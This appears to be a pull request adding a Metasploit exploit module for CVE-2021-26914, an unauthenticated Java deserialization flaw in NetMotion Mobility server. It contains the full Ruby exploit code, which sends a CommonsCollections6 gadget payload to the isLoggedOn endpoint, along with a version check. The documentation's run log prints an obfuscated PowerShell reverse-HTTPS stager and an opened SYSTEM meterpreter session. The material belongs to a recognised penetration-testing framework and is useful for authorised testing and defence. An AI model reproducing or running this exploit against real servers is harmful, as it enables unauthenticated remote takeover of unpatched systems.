### PR TITLE
Add NetMotion Mobility CVE-2021-26914 exploit

### DIFF
--- a/documentation/modules/exploit/windows/http/netmotion_mobility_mvcutil_deserialization.md
+++ b/documentation/modules/exploit/windows/http/netmotion_mobility_mvcutil_deserialization.md
@@ -1,0 +1,102 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an unauthenticated Java deserialization in the
+NetMotion Mobility server's `MvcUtil.valueStringToObject()` method, as
+invoked through the `/mobility/Menu/isLoggedOn` endpoint, to execute
+code as the `SYSTEM` account.
+
+Mobility server versions 11.x before 11.73 and 12.x before 12.02 are
+vulnerable. Tested against 12.01.09045 on Windows Server 2016.
+
+### Setup
+
+Follow the [Mobility System Administrator Guide - v12.0x], paying
+particular attention to the [Basic System Requirements for All Server
+Components]. I used the `Mobility_server_12.01_Win2016_release.exe`
+installer.
+
+[Mobility System Administrator Guide - v12.0x]:
+https://help.netmotionsoftware.com/support/docs/MobilityXG/1200/help/mobilityhelp.htm
+
+[Basic System Requirements for All Server Components]:
+https://help.netmotionsoftware.com/support/docs/MobilityXG/1200/help/mobilityhelp.htm#page/Mobility%2520Server%2Fintro.01.09.html%23
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### NetMotion Mobility 12.01.09045 on Windows Server 2016
+
+```
+msf6 > use exploit/windows/http/netmotion_mobility_mvcutil_deserialization
+[*] Using configured payload windows/x64/meterpreter/reverse_https
+msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > options
+
+Module options (exploit/windows/http/netmotion_mobility_mvcutil_deserialization):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_https):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The local listener hostname
+   LPORT     8443             yes       The local listener port
+   LURI                       no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   PowerShell
+
+
+msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set rhosts 192.168.123.135
+rhosts => 192.168.123.135
+msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set verbose true
+verbose => true
+msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > run
+
+[*] Started HTTPS reverse handler on https://192.168.123.1:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. NetMotion Mobility 12.01.09045 is unpatched.
+[*] Executing windows/x64/meterpreter/reverse_https (PowerShell)
+[*] Powershell command length: 2886
+[*] Triggering deserialization
+[*] Executing command: set Path=%Path%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0&&powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[+] Successfully triggered deserialization
+[*] https://192.168.123.1:8443 handling request from 192.168.123.135; (UUID: d1ojcl7r) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 127.0.0.1) at 2021-05-15 18:43:47 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-FPMD9TVAMRK
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb
+++ b/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb
@@ -1,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::JavaDeserialization
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization',
+        'Description' => %q{
+          This module exploits an unauthenticated Java deserialization in the
+          NetMotion Mobility server's MvcUtil.valueStringToObject() method, as
+          invoked through the /mobility/Menu/isLoggedOn endpoint, to execute
+          code as the SYSTEM account.
+
+          Mobility server versions 11.x before 11.73 and 12.x before 12.02 are
+          vulnerable. Tested against 12.01.09045 on Windows Server 2016.
+        },
+        'Author' => [
+          'mr_me', # Discovery and PoC
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2021-26914'],
+          ['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'],
+          ['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'],
+          ['URL', 'https://srcincite.io/advisories/src-2021-0007/']
+        ],
+        'DisclosureDate' => '2021-02-08', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+              }
+            }
+          ],
+          [
+            'PowerShell',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS, # C:\Program Files\NetMotion Server\logs
+            ARTIFACTS_ON_DISK # CmdStager
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    when :psh
+      execute_command(
+        cmd_psh_payload(
+          payload.encoded,
+          payload.arch.first,
+          remove_comspec: true
+        )
+      )
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # XXX: %Path% is otherwise *only* C:\Program Files\NetMotion Server
+    cmd.prepend(
+      'set Path=%Path%;' \
+      'C:\Windows\System32' \
+      ';' \
+      'C:\Windows\System32\WindowsPowerShell\v1.0' \
+      '&&'
+    )
+
+    print_status('Triggering deserialization')
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'),
+      'vars_post' => {
+        'Mvc_x_Form_x_Name' => go_go_gadget(cmd)
+      }
+    )
+
+    unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing
+      fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization')
+    end
+
+    print_good('Successfully triggered deserialization')
+  end
+
+  def go_go_gadget(cmd)
+    Rex::Text.encode_base64(
+      Rex::Text.gzip(
+        generate_java_deserialization_for_command(
+          'CommonsCollections6',
+          'cmd', # cmd.exe
+          cmd
+        )
+      )
+    )
+  end
+
+end

--- a/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb
+++ b/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::JavaDeserialization
   include Msf::Exploit::CmdStager
@@ -92,6 +93,41 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/'])
     ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    unless (version = parse_version(res))
+      return CheckCode::Unknown('Failed to parse version from response.')
+    end
+
+    unless vuln_version?(version)
+      return CheckCode::Safe("NetMotion Mobility #{version} is patched.")
+    end
+
+    CheckCode::Appears("NetMotion Mobility #{version} is unpatched.")
+  end
+
+  def parse_version(res)
+    return unless res&.code == 200
+
+    # <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'>
+    res.get_html_document.at('//img[@alt = "Mobility"]/@src').to_s[
+      %r{^/images/menu_logo\.png\?version=(?<version>[\d.]+)$},
+      :version # Hat tip @adfoster-r7
+    ]
+  end
+
+  def vuln_version?(version)
+    @vuln_versions ||=
+      (11.0...11.73).step(0.01) + # 11.0 through 11.72
+      (12.0...12.02).step(0.01) # 12.0 through 12.01
+
+    @vuln_versions.include?(version.to_f)
   end
 
   def exploit


### PR DESCRIPTION
```
msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > info

       Name: NetMotion Mobility Server MvcUtil Java Deserialization
     Module: exploit/windows/http/netmotion_mobility_mvcutil_deserialization
   Platform: Windows
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-02-08

Provided by:
  mr_me
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Command
  1   Dropper
  2   PowerShell

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated Java deserialization in the
  NetMotion Mobility server's MvcUtil.valueStringToObject() method, as
  invoked through the /mobility/Menu/isLoggedOn endpoint, to execute
  code as the SYSTEM account. Mobility server versions 11.x before
  11.73 and 12.x before 12.02 are vulnerable. Tested against
  12.01.09045 on Windows Server 2016.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-26914
  https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/
  https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020
  https://srcincite.io/advisories/src-2021-0007/

msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) >
```